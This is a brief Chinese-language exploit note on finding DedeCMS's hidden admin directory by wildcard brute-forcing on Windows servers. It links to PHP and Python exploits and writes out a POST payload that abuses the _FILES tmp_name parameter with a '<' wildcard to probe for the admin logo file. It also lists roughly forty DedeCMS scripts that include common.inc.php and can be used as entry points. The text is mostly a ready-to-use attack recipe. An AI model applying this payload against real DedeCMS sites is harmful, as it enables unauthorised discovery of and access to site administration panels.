dede通配符爆破后台~

仅限win

exp(php):https://xianzhi.aliyun.com/forum/topic/2064**
exp(python3):https://mochazz.github.io/2018/02/26/DEDECMS%E6%89%BE%E5%90%8E%E5%8F%B0%E7%9B%AE%E5%BD%95%E6%8A%80%E5%B7%A7/**

  • 这个地方要说一下,包含了common.inc.php的都可以跑…..

包含了common.inc.php的文件:

  • 这里二级目录爆破的话,exp的语句需要改一下
1
dopost=save&_FILES[b4dboy][tmp_name]=../$v$vv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif
  • /install/module_autos.php
  • /m/index.php
  • /m/list.php
  • /m/view.php
  • /member/config.php
  • /plus/ad_js.php
  • /plus/advancedsearch.php
  • /plus/arcmulti.php
  • /plus/bookfeedback.php
  • /plus/bookfeedback_js.php
  • /plus/car.php
  • /plus/carbuyaction.php
  • /plus/comments_frame.php
  • /plus/count.php
  • /plus/digg_ajax.php
  • /plus/digg_frame.php
  • /plus/disdls.php
  • /plus/diy.php
  • /plus/download.php
  • /plus/erraddsave.php
  • /plus/feedback.php
  • /plus/feedback_ajax.php
  • /plus/feedback_js.php
  • /plus/flink.php
  • /plus/flink_add.php
  • /plus/freelist.php
  • /plus/guestbook.php
  • /plus/heightsearch.php
  • /plus/list.php
  • /plus/mytag_js.php
  • /plus/posttocar.php
  • /plus/qrcode.php
  • /plus/recommend.php
  • /plus/rss.php
  • /plus/search.php
  • /plus/showphoto.php
  • /plus/stow.php
  • /plus/task.php
  • /plus/view.php
  • /plus/vote.php